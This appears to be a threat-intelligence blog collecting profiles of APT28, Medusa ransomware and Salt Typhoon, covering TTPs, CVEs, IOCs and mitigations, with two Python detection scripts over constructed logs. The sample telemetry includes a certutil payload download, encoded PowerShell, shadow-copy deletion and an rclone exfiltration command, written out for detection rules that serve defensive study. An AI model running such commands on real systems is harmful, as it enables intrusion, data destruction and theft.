Threat Actors

The Russian Bear Unleashed: The Cyber Threat of APT28

Beyond its majestic image, the Russian Bear has a darker side. Delve into the world of cyber espionage and uncover the advanced tactics and tools employed by APT28 to steal sensitive information and disrupt critical systems.

The Russian Bear, a symbol deeply ingrained in Russian culture, is often associated with the Eurasian brown bear. This majestic creature, known for its immense strength and solitary nature, embodies the vast and untamed landscapes of Russia. From the dense forests of Siberia to the remote wilderness of Kamchatka, the Russian Bear roams freely, captivating imaginations and evoking a sense of awe and respect.

APT28, also known as Fancy Bear amongst other aliases, does not evoke the same sense of awe and respect, at least not from a cyber defender's perspective. APT28 is a highly sophisticated cyber espionage group assessed to be linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Special Service Centre (GTsSS), a military intelligence unit.

Estonian and British intelligence services have also associated APT28 with Russian military intelligence (GRU). The United States believes that GRU units 26165 and 74455 form part of this threat actor. APT28 has been active since at least 2004.

Targets and Objectives

APT28 primarily targets:

  • Governments
  • Military organisations
  • Media outlets
  • Research institutions
  • Private sector companies

The group’s objectives include:

  • Gathering intelligence
  • Stealing sensitive information
  • Disrupting systems
  • Influencing political processes
  • Criminal financial gain

Tactics, Techniques and Procedures (TTPs)

APT28 is known for its sophisticated and constantly evolving TTPs, which include:

  • Spearphishing: They send targeted emails with malicious attachments or links, often disguised as legitimate communications, to trick victims into revealing their credentials or installing malware.
  • Exploiting vulnerabilities: They exploit software vulnerabilities in operating systems, applications and network devices to gain unauthorised access to systems. These may include zero-day exploits, taking advantage of vulnerabilities before patches are available.
  • Watering hole attacks: They compromise websites frequently visited by target organisations and inject malicious code to deliver malware to visitors.
  • Credential harvesting: They create spoofed websites mimicking legitimate organisations to steal user credentials.
  • Brute-force attacks: They use brute-force techniques, including password spraying, to gain access to accounts.
  • Lateral movement: Once inside a network, they move laterally to other systems using techniques such as pass-the-hash and exploiting the EternalBlue vulnerability, expanding their access and searching for valuable data.
  • Data exfiltration: They steal sensitive information such as intellectual property, trade secrets and personal data, often using encrypted channels to avoid detection.
  • Command and control (C2) infrastructure: They utilise various protocols, including HTTP and DNS, to communicate with malware and exfiltrate data, making it difficult to detect and block their activities. They may also leverage compromised infrastructure, including routers and network devices, to act as C2 servers.
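The password spraying listed under brute-force attacks above has a recognisable shape in authentication logs: one source failing against many accounts with only one or two attempts each, which is the opposite of a single-account brute force that a per-user lockout policy already catches. The following is an added example, not code from the original article: a small Python detector run over a constructed authentication log; the log format, thresholds and function names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real incident).
# One event per line: <utc timestamp> <source ip> <username> <result>
SAMPLE_AUTH_LOG = """\
2024-05-02T08:00:05Z 198.51.100.23 a.smith FAIL
2024-05-02T08:00:14Z 198.51.100.23 b.jones FAIL
2024-05-02T08:00:23Z 198.51.100.23 c.wong FAIL
2024-05-02T08:00:31Z 198.51.100.23 d.patel FAIL
2024-05-02T08:00:40Z 198.51.100.23 e.muller FAIL
2024-05-02T08:00:52Z 198.51.100.23 f.rossi FAIL
2024-05-02T08:01:03Z 198.51.100.23 g.kim FAIL
2024-05-02T08:01:11Z 198.51.100.23 h.novak FAIL
2024-05-02T08:01:20Z 198.51.100.23 i.costa FAIL
2024-05-02T08:01:33Z 198.51.100.23 j.olsen FAIL
2024-05-02T08:01:50Z 198.51.100.23 k.berg SUCCESS
2024-05-02T08:10:00Z 203.0.113.9 admin FAIL
2024-05-02T08:10:10Z 203.0.113.9 admin FAIL
2024-05-02T08:10:20Z 203.0.113.9 admin FAIL
2024-05-02T08:10:30Z 203.0.113.9 admin FAIL
2024-05-02T08:10:40Z 203.0.113.9 admin FAIL
2024-05-02T08:10:50Z 203.0.113.9 admin FAIL
2024-05-02T08:15:00Z 192.0.2.5 m.lee FAIL
2024-05-02T08:15:20Z 192.0.2.5 m.lee SUCCESS
"""


def parse_auth_log(text):
    """Parse the constructed log into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "user": user, "result": result,
        })
    return events


def detect_password_spray(events, window=timedelta(minutes=10), min_users=8):
    """Flag a source that fails against at least min_users distinct accounts
    inside one window: few attempts per account, many accounts per source.
    Any SUCCESS from that source in the same window is a probable hit."""
    findings = []
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for first in evs:
            span = [e for e in evs if first["ts"] <= e["ts"] <= first["ts"] + window]
            failed_users = {e["user"] for e in span if e["result"] == "FAIL"}
            if len(failed_users) >= min_users:
                hits = sorted({e["user"] for e in span if e["result"] == "SUCCESS"})
                findings.append({"src": src, "start": first["ts"],
                                 "users": len(failed_users), "compromised": hits})
                break  # one finding per source is enough for triage
    return findings


def detect_brute_force(events, window=timedelta(minutes=10), min_failures=5):
    """Flag (source, account) pairs with at least min_failures failures in one
    window: the single-account pattern that lockout policies are built for."""
    findings = []
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["src"], ev["user"])].append(ev)
    for (src, user), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for first in evs:
            span = [e for e in evs if first["ts"] <= e["ts"] <= first["ts"] + window]
            fails = sum(1 for e in span if e["result"] == "FAIL")
            if fails >= min_failures:
                findings.append({"src": src, "user": user, "failures": fails})
                break
    return findings


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    for f in detect_password_spray(evs):
        print("password spray:", f)
    for f in detect_brute_force(evs):
        print("brute force:", f)
```

The spray finding carries the account that accepted the sprayed password, which is the one to reset and enrol in MFA first; the single-account brute force is reported separately so the two shapes are not confused.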

Notable Malware and Tools

APT28 uses a range of custom-developed and publicly available malware and tools, including:

  • Sednit/Sofacy: A modular suite of malware tools designed for surveillance, data theft and persistence.
  • XAgent: A remote access trojan (RAT) with variants for iOS, Unix and Windows; current versions protect their communications with SSL/TLS. XAgent provides keylogging and file extraction.
  • X-Tunnel: A network tunnelling tool used to create encrypted tunnels for secure data exfiltration.
  • CompuTrace/Lojack: Legitimate software modified by APT28 to enable persistence.
  • Responder: An open source tool used to facilitate NetBIOS Name Service (NBT-NS) poisoning and steal usernames and hashed passwords.
  • EternalBlue: An exploit for a vulnerability in Microsoft’s SMB protocol, used for lateral movement.
  • Empire: A post-exploitation framework, including PowerShell and Python versions, used for various malicious activities.

Notable Attacks

APT28 has been linked to several high-profile cyberattacks, including:

  • Interference in the 2016 US presidential election: The group targeted the Democratic National Committee (DNC) and the Hillary Clinton campaign, stealing sensitive emails and other information that were later leaked to the public.
  • Attack on the German parliament in 2015: This attack involved data theft and the disruption of email accounts belonging to German Members of Parliament (MPs) and the Vice Chancellor.
  • Attempted attack on the Organisation for the Prohibition of Chemical Weapons (OPCW) in 2018: This attack was intended to disrupt independent analysis of chemical weapons used by the GRU in the UK.
  • Compromising a satellite communications provider in 2023: This intrusion targeted a provider with critical infrastructure customers.
  • Targeting the hospitality sector in 2017: APT28 targeted hotels throughout Europe and the Middle East, using techniques such as sniffing passwords from Wi-Fi traffic and spreading laterally via EternalBlue.

Mitigating the Threat

Organisations can take steps to mitigate the threat posed by APT28 and other advanced persistent threats:

  • Implement strong password policies: Enforce strong, unique passwords for all accounts and implement multi-factor authentication where possible.
  • Keep systems and software up to date: Regularly patch systems and applications to address known vulnerabilities.
  • Educate employees on security best practices: Train employees on how to identify and avoid phishing attacks and other social engineering tactics.
  • Network segmentation: Divide networks into smaller segments to limit the impact of a potential breach.
  • Employ advanced security tools: Utilise intrusion detection systems, firewalls, endpoint protection solutions, and security information and event management (SIEM) systems to detect and respond to malicious activity.
  • Develop and test incident response plans: Establish procedures for responding to security incidents and regularly test these plans.
  • Threat intelligence sharing: Participate in information sharing with other organisations and industry groups to stay informed about the latest threats and TTPs.

Threat Actors

Spearwing / Medusa Ransomware Threat Actor Profile

Medusa is a notable ransomware-as-a-service (RaaS) variant that emerged in June 2021, utilizing a double extortion model to encrypt data and threaten public release of sensitive information. Operated by the group “Spearwing,” Medusa has shifted towards an affiliate model, significantly impacting critical sectors like healthcare and manufacturing, with over 300 reported victims by early 2025. The introduction of a dedicated leak site in 2023 and a 42% surge in attacks from 2023 to 2024 highlight its growing threat. Organizations must strengthen cybersecurity measures, including patching vulnerabilities and implementing multi-factor authentication, to counteract this persistent danger.

In the rapidly changing environment of cyber threats, Medusa stands out as a particularly menacing ransomware-as-a-service (RaaS) variant that first emerged in June 2021. Employing a double extortion model, this ransomware not only encrypts its victims’ data but also threatens to publicly release sensitive information if the ransom demands are not met. This dual-layered approach has enabled Medusa to significantly escalate its operations, with its impact felt across critical sectors, including healthcare, education, and manufacturing, where over 300 victims have been reported by early 2025.

The group behind Medusa, known as “Spearwing,” has transitioned from a closed ecosystem to a broader affiliate model, leveraging initial access brokers to extend its reach and effectiveness. With the introduction of a dedicated data leak site in early 2023 and a marked increase in attacks, understanding the tactics, techniques, and implications of Medusa ransomware is crucial for organizations striving to bolster their cybersecurity defenses in the face of such persistent threats.

The following sections will delve deeper into Medusa’s operational model, extortion tactics, technical details, and strategies for mitigation.

Overview and Origins

Medusa is identified as a ransomware-as-a-service (RaaS) variant that was first observed in June 2021. It has become increasingly prolific since then. The group operates a double extortion model, where they not only encrypt victim data but also threaten to publicly release exfiltrated data if a ransom is not paid. Medusa is distinct from the older MedusaLocker ransomware variant and the unrelated Medusa mobile malware. The group is tracked by Symantec as “Spearwing”. In early 2023, Medusa launched the “Medusa Blog,” a dedicated leak site to publish data from non-paying victims.

Activity and Impact

As of February 2025, Medusa developers and affiliates had impacted over 300 victims from a variety of critical infrastructure sectors. These sectors include medical, education, legal, insurance, technology, and manufacturing. There was a 42% surge in Medusa attacks between 2023 and 2024, and this increase continued into early 2025, with almost twice as many attacks observed in January and February 2025 compared to the same period in 2024. The true number of victims is likely higher than the number listed on their data leak site. Ransom demands have ranged from $100,000 to $15 million. The impact of Medusa ransomware can be devastating, leading to operational disruptions, financial losses, and reputational damage.

Operating Model

Medusa operates as a RaaS platform. Initially a closed group, it has since expanded to use an affiliate-based ecosystem. Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to gain initial access. Potential payments between $100 USD and $1 million USD are offered to these affiliates. Important operations such as ransom negotiation are still centrally controlled by the developers. There is some question as to whether Spearwing operates as a “typical” RaaS, given the consistency of tactics used, possibly indicating the group carries out attacks themselves or works with a very limited number of affiliates and provides a detailed playbook.

Extortion Tactics

Medusa employs a double extortion model, encrypting data and threatening to publish exfiltrated data on their .onion data leak site (Medusa Blog) if the ransom is not paid. They operate a public Telegram channel (“information support”) where they also publicise hacks and release stolen data, making it more accessible than some other ransomware groups. Ransom demands are posted on the leak site with direct hyperlinks to Medusa-affiliated cryptocurrency wallets. They also advertise the sale of the data to interested parties before the countdown timer ends. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer. FBI investigations identified a potential triple extortion scheme where a separate Medusa actor contacted a victim after ransom payment, claiming the negotiator stole the initial payment and demanding a second payment.

Technical Details (TTPs)

  • Initial Access (TA0001):
    • Phishing campaigns (T1566) are a primary method for stealing victim credentials.
    • Exploitation of unpatched software vulnerabilities (T1190) through Common Vulnerabilities and Exposures (CVEs) such as ScreenConnect vulnerability CVE-2024-1709 and Fortinet EMS SQL injection vulnerability CVE-2023-48788. They have also exploited Microsoft Exchange Server vulnerabilities (ProxyShell, CVE-2021-34473).
    • Recruitment of initial access brokers (IABs) (TA0001).
    • Use of compromised RDP credentials (T1133).
    • Uploading webshells to exploited Microsoft Exchange Servers.
  • Execution (TA0002):
    • Use of PowerShell (T1059.001) and the Windows Command Prompt (cmd.exe) (T1059.003) for various tasks.
    • Leveraging legitimate tools like ConnectWise, PDQ Deploy, and PsExec.
    • Use of batch scripts including gaze.exe.
    • Utilising Windows Management Instrumentation (WMI) (T1047) for querying system information and deleting shadow copies.
  • Persistence (TA0003):
    • Modifying the registry (T1547.001, HKLM\Software\Microsoft\Windows\CurrentVersion\Run).
    • Creating malicious scheduled tasks (T1053).
    • Creating domain accounts (T1136.002).
  • Privilege Escalation (TA0004):
    • Abuse of Elevation Control Mechanism (T1548.002) by bypassing User Account Control (UAC).
    • Use of valid accounts (T1078) obtained through various methods.
    • LSASS memory dumping (T1003.001) using tools like Mimikatz.
  • Defense Evasion (TA0005):
    • Use of living off the land (LOTL) techniques (TA0005) to avoid detection, leveraging legitimate tools present in the victim environment.
    • Using Certutil (certutil.exe) for file ingress to avoid detection.
    • Employing various PowerShell detection evasion techniques, including base64 encoding and string obfuscation.
    • Attempting to delete PowerShell command line history (T1070.003).
    • Attempting to use vulnerable or signed drivers (Bring Your Own Vulnerable Driver – BYOVD) (T1562.001) to kill or delete endpoint detection and response (EDR) tools. Malicious drivers like ABYSSWORKER (imitating a CrowdStrike Falcon driver) are used. They also use tools like KillAV and POORTRY.
    • Using reverse tunneling tools like Ligolo and Cloudflared (formerly ArgoTunnel) for command and control and evasion.
    • Disabling Windows Defender and other antivirus services.
    • Rebooting systems into Safe Mode.
    • Deleting previously installed tools (T1070).
  • Discovery (TA0007):
    • Using legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner (NetScan) for initial user, system, and network enumeration.
    • Scanning commonly used ports (21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389).
    • Using PowerShell and cmd.exe for network (T1046) and filesystem enumeration (T1083).
    • Utilizing Windows Management Instrumentation (WMI) (T1047) for querying system information.
    • Querying shared drives (T1135) on the local system.
    • Gathering system network configuration (T1016) and detailed system information (T1082) using commands like ipconfig /all and systeminfo.
    • Attempting to find domain-level group and permission settings (T1069.002).
    • Using driverquery, net share, net use, netstat -a, sc query, schtasks, ver, wmic for reconnaissance.
  • Lateral Movement (TA0008):
    • Using a variety of legitimate remote access software (T1219) such as AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop.
    • Utilizing Remote Desktop Protocol (RDP) (T1021.001).
    • Using PsExec (T1569.002) to move laterally and deploy the encryptor.
    • Leveraging SMB/Windows Admin Shares (T1021.002).
  • Exfiltration (TA0010):
    • Identifying files for exfiltration.
    • Installing and using Rclone (T1567.002) to facilitate data exfiltration to Medusa C2 servers.
  • Encryption (T1486):
    • Deploying the encryptor, gaze.exe, across the network using tools like PsExec, PDQ Deploy, or BigFix (T1072).
    • Terminating services (T1489) related to backups, security, databases, communication, file sharing, and websites.
    • Deleting shadow copies (T1490).
    • Encrypting files with AES-256.
    • Appending the .medusa file extension to encrypted files.
    • Dropping the ransom note, typically named !!!READ_ME_MEDUSA!!!.txt.
    • Manually turning off (T1529) and encrypting virtual machines.
    • Deleting itself after encryption.
  • Command and Control (C2):
    • Using reverse tunneling tools like Ligolo and Cloudflared.
    • Communicating using application layer protocols associated with web traffic (T1071.001), including scripts that create reverse or bind shells over port 443 (HTTPS).
    • Leveraging remote access software (T1219) for control.

Indicators of Compromise (IOCs)

  • File Paths and Names:
    • csidl_windows\adminarsenal\pdqdeployrunner\service-1\exec\gaze.exe.
    • svhost.exe (in AppData).
    • !!!READ_ME_MEDUSA!!!.txt.
    • openrdp.bat.
    • pu.exe.
  • File Extensions:
    • .medusa.
    • .mylock.
    • .s3db (observed in one Darktrace investigation).
  • Domains & URLs:
    • medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd[.]onion.
    • go-sw6-02.adventos[.]de.
    • medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd[.]onion.
  • Registry Keys:
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MDSLK.
  • Email Addresses (used for ransom negotiation):
    • key.medusa.serviceteam@protonmail.com.
    • medusa.support@onionmail.org.
    • mds.svt.breach@protonmail.com.
    • mds.svt.mir2@protonmail.com.
    • MedusaSupport@cock.li.
  • Hashes (examples): See Table 1 in source and hashes listed in. Note that some sources redact hashes.
  • Credentials (observed in a Darktrace investigation): Svc-ndscans, Svc-NinjaRMM.
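Several of the TTPs and indicators above map directly onto host telemetry: a certutil download, an encoded PowerShell command, a WMI shadow copy deletion, a write to the MDSLK Run key, gaze.exe launched from the PDQ Deploy runner path and an rclone transfer. The following is an added example, not code from the original profile or from any vendor: a rule-based triage in Python over constructed process-creation and registry events; the event format, rule weights, host names and sample lines are assumptions, and the ATT&CK ids are the ones quoted in the TTP list above.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from any real victim). One event per line:
#   <utc timestamp>|<host>|<event type>|<command line or registry path>
SAMPLE_EVENTS = """\
2025-02-03T10:01:12Z|WS-014|ProcessCreate|certutil.exe -urlcache -split -f http://203.0.113.7/pu.exe C:\\Users\\Public\\pu.exe
2025-02-03T10:02:40Z|WS-014|ProcessCreate|powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA=
2025-02-03T10:05:01Z|WS-014|ProcessCreate|wmic shadowcopy delete
2025-02-03T10:05:30Z|WS-014|RegistrySet|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MDSLK
2025-02-03T10:07:15Z|SRV-DC1|ProcessCreate|C:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-1\\exec\\gaze.exe
2025-02-03T10:08:02Z|SRV-FS2|ProcessCreate|rclone.exe copy E:\\Shares\\Finance remote:exfil --transfers 8
2025-02-03T09:58:00Z|WS-020|ProcessCreate|ipconfig.exe /all
2025-02-03T09:59:00Z|WS-020|ProcessCreate|notepad.exe C:\\Users\\alice\\notes.txt
"""

# (rule name, ATT&CK id as quoted in the profile, event type, pattern, weight)
# Weights are an assumption: discovery is noisy and scores low, pre-encryption
# and exfiltration steps score high.
RULES = [
    ("certutil file ingress", "TA0005", "ProcessCreate",
     r"certutil(\.exe)?\s.*-urlcache\b", 3),
    ("encoded PowerShell", "T1059.001", "ProcessCreate",
     r"powershell(\.exe)?\s.*\s-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 3),
    ("shadow copy deletion", "T1490", "ProcessCreate",
     r"wmic\s+shadowcopy\s+delete|vssadmin(\.exe)?\s+delete\s+shadows", 5),
    ("Medusa Run key (MDSLK)", "T1547.001", "RegistrySet",
     r"\\CurrentVersion\\Run\\MDSLK$", 5),
    ("gaze.exe encryptor launch", "T1486", "ProcessCreate",
     r"\\gaze\.exe(\s|$)", 5),
    ("rclone exfiltration", "T1567.002", "ProcessCreate",
     r"(^|\\|\s)rclone(\.exe)?\s", 5),
    ("network config discovery", "T1016", "ProcessCreate",
     r"ipconfig(\.exe)?\s+/all\b", 1),
]
COMPILED = [(n, t, e, re.compile(p, re.IGNORECASE), w) for n, t, e, p, w in RULES]


def parse_events(text):
    """Split the pipe-delimited sample into event dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, host, etype, detail = line.split("|", 3)
            events.append({"ts": ts, "host": host, "type": etype, "detail": detail})
    return events


def triage(text):
    """Return one finding per (event, rule) match, in event order."""
    findings = []
    for ev in parse_events(text):
        for name, tech, etype, rx, weight in COMPILED:
            if ev["type"] == etype and rx.search(ev["detail"]):
                findings.append({**ev, "rule": name, "technique": tech, "weight": weight})
    return findings


def score_hosts(findings):
    """Sum rule weights per host, highest first. One discovery command scores 1;
    a host that stages a download, runs encoded PowerShell, deletes shadow copies
    and writes the MDSLK Run key scores 16 and belongs at the top of the queue."""
    scores = defaultdict(int)
    for f in findings:
        scores[f["host"]] += f["weight"]
    return dict(sorted(scores.items(), key=lambda kv: (-kv[1], kv[0])))


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['ts']} {f['host']:8} {f['technique']:10} {f['rule']}")
    print("host scores:", score_hosts(found))
```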

Mitigation Strategies

Organisations are advised to:

  • Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.
  • Segment networks to limit lateral movement.
  • Filter network traffic by blocking access from unknown or untrusted origins to remote services on internal systems.
  • Implement the recommendations in the Mitigations section of the CISA advisory.
  • Enable MFA for RDP and VPNs.
  • Disable PowerShell for non-administrators.
  • Regularly back up data offline. Ensure backups are immutable.
  • Implement strong security measures, including up-to-date security solutions.
  • Use hard-to-crack unique passwords and enable multi-factor authentication.
  • Encrypt sensitive data wherever possible.
  • Reduce the attack surface by disabling unnecessary functionality.
  • Educate and inform staff about cyber threats and methods used by attackers.
  • Block known Medusa domains.
  • Detect unusual RDP access patterns and SMB enumeration.
  • Use behavioral analytics to detect mass file encryption.
  • Isolate infected systems immediately.
  • Restore from offline backups.
  • Report incidents to CISA/FBI.
  • Consider using AI-powered endpoint protection and AI-powered email protection.
  • Create and regularly test a detailed incident response plan.
  • Disable unused remote access tools or secure them with strong passwords and MFA.
  • Apply the principle of least privilege.
  • Consider disabling command-line and scripting activities and permissions to limit LotL techniques.
  • Validate security controls against the MITRE ATT&CK techniques outlined in the advisory.

Relationships and Ecosystem

The Medusa ransomware group appears to operate independently, with its own infrastructure. However, the organised cybercrime group “Frozen Spider” is believed to be a key player in the Medusa ransomware operation, collaborating with other threat actors as part of the larger cybercrime-as-a-service (CCaaS) ecosystem. In June 2023, an early Medusa attack used drivers related to those previously used in a BlackCat (aka Noberus) attack, suggesting a possible sharing of tools or affiliates, although no further evidence strongly links the two groups. Medusa heavily relies on initial access brokers (IABs) to gain access to victim networks.

Branding and Public Presence

Medusa operates a data leak site (Medusa Blog) on the dark web (.onion). They also maintain a public Telegram channel (“information support”) used to publicise victims and leak data. Additionally, they have been linked to a Facebook profile and an X (formerly Twitter) account under the brand ‘OSINT Without Borders,’ run by operators using pseudonyms ‘Robert Vroofdown’ and ‘Robert Enaber,’ along with an associated website. These public-facing properties are likely intended to exert more pressure on victims and spread awareness of the Medusa ransomware threat. The group has a “Medusa Media Team” that has even published videos showing evidence of stolen data on their blog.

Conclusion

Medusa ransomware represents a significant and evolving cyber threat targeting a wide range of critical infrastructure sectors globally. Its use of a double (and potentially triple) extortion model, reliance on affiliates and IABs, and consistent employment of both sophisticated and LOTL techniques make it a challenging adversary. Organisations must adopt a defense-in-depth strategy, continuously update their threat intelligence, and implement robust security controls to mitigate the risk posed by Medusa ransomware.

Threat Actors

Salt Typhoon: A Deep Dive into a Persistent Cyber Espionage Threat

Salt Typhoon, a Chinese state-sponsored APT, remains a major cyber espionage threat, targeting telecoms, governments, and technology sectors. Recent activity shows exploitation of Cisco IOS XE devices, impacting organisations globally. Defend with robust cybersecurity, prioritise patching, and share threat intelligence to counter this persistent adversary.

Salt Typhoon is a Chinese state-sponsored Advanced Persistent Threat (APT) group known for its sophisticated cyber espionage campaigns, primarily targeting the telecommunications, government, and technology sectors. The group’s operations extend beyond intelligence gathering, aiming to exert strategic pressure on adversaries by targeting critical infrastructure and key industries.

Aliases and Affiliations

Salt Typhoon operates under various aliases, including:

  • Earth Estries.
  • GhostEmperor.
  • FamousSparrow.
  • UNC2286.
  • RedMike.

The group is believed to be affiliated with China’s Ministry of State Security (MSS). Connections to other Chinese APT groups, such as DRBControl, SparklingGoblin, and the Winnti Group, have also been observed, indicating shared methodologies and a coordinated state-backed effort.

Timeline and Key Campaigns

  • 2019: Believed to be active since at least 2019, with some suggesting activity as far back as 2017.
  • March 2021: Exploited ProxyLogon vulnerabilities in Microsoft Exchange servers.
  • Late 2023: Resurfaced with network compromises involving the Demodex rootkit.
  • September 2024: Breached US Internet Service Providers (ISPs).
  • November 2024: Targeted T-Mobile, exfiltrating customer call records and metadata.
  • December 2024 – January 2025: Exploited Cisco IOS XE network devices, targeting telecommunications providers and universities globally.

Target Sectors and Geographic Focus

Salt Typhoon’s targets span various sectors:

  • Telecommunications: Wireline and wireless telephone providers, internet service companies.
  • Government: Government entities, including those involved in national security and law enforcement.
  • Technology: Companies in the information and communication technology sector.
  • Hotels: Targeting hotels to monitor the locations of key individuals.
  • Various Others: Militaries, solar energy companies, financial institutions, NGOs, international organizations, engineering firms, and law practices.

The group’s geographic focus is broad, encompassing:

  • North America: Primarily the United States.
  • Southeast Asia: Focused efforts on hotels and telecommunications companies.
  • Other Regions: Including Brazil, Burkina Faso, South Africa, Canada, Israel, France, Guatemala, Lithuania, Saudi Arabia, Taiwan, Thailand, and the United Kingdom.

Tactics, Techniques, and Procedures (TTPs)

Salt Typhoon employs a range of sophisticated TTPs to infiltrate and maintain persistence within target environments:

  • Initial Access:
    • Exploiting public-facing applications.
    • Spearphishing attachments.
    • Exploitation of known vulnerabilities.
  • Execution:
    • Using command and scripting interpreters like PowerShell.
    • Executing malicious files, such as side-loaded DLLs.
  • Persistence:
    • Modifying the registry.
    • Creating or modifying system processes.
    • Kernel-mode malware.
  • Privilege Escalation:
    • Exploiting vulnerabilities.
    • Scheduled tasks/jobs.
  • Defense Evasion:
    • Obfuscated files or information.
    • Masquerading.
    • Indicator removal.
  • Lateral Movement:
    • Exploitation of remote services.
    • Leveraging valid credentials.
  • Credential Access:
    • Dumping credentials from password stores and web browsers.
    • Extracting credentials from files.
  • Collection:
    • Gathering data from local systems.
    • Monitoring clipboard data.
  • Command and Control:
    • Using remote access software.
    • Employing internal proxy servers.
  • Impact:
    • Data encrypted for impact (primarily for espionage, not extortion).

Toolset and Malware

Salt Typhoon utilises a diverse toolkit comprising legitimate, custom-made, and borrowed tools:

  • Custom Backdoors: SparrowDoor and Demodex.
  • Rootkits: Demodex, a Windows kernel-mode rootkit.
  • Loaders: SparrowDoor loader.
  • Remote Access Trojans (RATs): Masol RAT and SnappyBee (aka Deed RAT).
  • Exploitation Tools: Mimikat_ssp (a Mimikatz variant), Get-PassHashes.ps1, GetPwd, Token.exe.
  • Living off the Land Binaries (LOLBins): Utilising legitimate system tools to perform malicious activities.
  • GhostSpider: A newer backdoor.
  • Derusbi: A DLL-based backdoor.
  • Motnug: A shellcode loader.
  • NinjaCopy: Tool to bypass security mechanisms and extract sensitive system files.

The group’s malware often incorporates anti-forensic and anti-analysis techniques to evade detection.

Vulnerabilities Exploited

Salt Typhoon has been known to exploit the following vulnerabilities:

  • CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN).
  • CVE-2023-48788 (Fortinet FortiClient EMS).
  • CVE-2022-3236 (Sophos Firewall).
  • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon).
  • CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE Software).

Countermeasures and Mitigation Strategies

Defending against Salt Typhoon requires a comprehensive, multi-layered approach:

  • Robust Cybersecurity Frameworks: Implementing zero-trust architecture, continuous monitoring, and regular vulnerability assessments.
  • Patch Management: Applying security patches promptly, particularly for known vulnerabilities in Cisco devices and other network infrastructure.
  • Network Segmentation: Isolating critical systems and implementing strict access control lists (ACLs) to regulate network traffic.
  • Threat Intelligence: Sharing threat intelligence and staying informed about Salt Typhoon’s latest TTPs.
  • Incident Response: Developing and testing incident response plans to effectively contain and eradicate intrusions.
  • Out-of-Band Management: Utilising a physically separate management network to prevent unauthorised access to operational networks.
  • Secure by Design Principles: Encourage software manufacturers to embed security throughout the development lifecycle to strengthen the overall security posture of their products.
  • Encrypted Communications: Advising individuals concerned about privacy to use encrypted messaging apps and voice communications.

Attribution and Geopolitical Context

Salt Typhoon’s activities align with China’s broader geopolitical objectives, including intelligence collection, monitoring individuals, and potential disruption of adversarial capabilities. The group’s targeting of telecommunications companies enables them to intercept communications, monitor activities, and enhance their intelligence-gathering capabilities.

Conclusion

Salt Typhoon represents a significant and persistent threat to global telecommunications infrastructure and other critical sectors. The group’s advanced TTPs, diverse toolkit, and state-sponsored backing make it a formidable adversary. Organisations must adopt a proactive and multi-layered approach to security, prioritising vulnerability management, network segmentation, and threat intelligence sharing, to effectively defend against this evolving threat. Continuous vigilance and collaboration between public and private sectors are essential to mitigating the risks posed by Salt Typhoon and similar APT groups.

CISO Blog

The Black Basta Menace: A Deep Dive

This ransomware gang is a real pain in the neck. They’re relentless, sophisticated, and they’re not afraid to target anyone, from small businesses to large corporations. You are not unlucky if they hit you; they TARGET you.

These cybercriminals are like digital pirates, sailing the high seas of the internet and plundering unsuspecting Spanish Galleons. They use every trick in the book, from phishing emails to exploiting vulnerabilities. And once they’re in, they wreak havoc, encrypting data and demanding a ransom.

So, what can you do to protect yourself from these cyber pirates? Well, for starters, you need to be vigilant. Don’t click on suspicious links, keep your software up-to-date, and use strong, unique passwords. And if you’re really serious about security, invest in a good cybersecurity solution.

Remember, the best defense is a good offense. Stay informed, stay vigilant, and most importantly, stay safe.

Want to know more? Take a look at my complete writeup of Black Basta

Copyright © 2017 Keller Holdings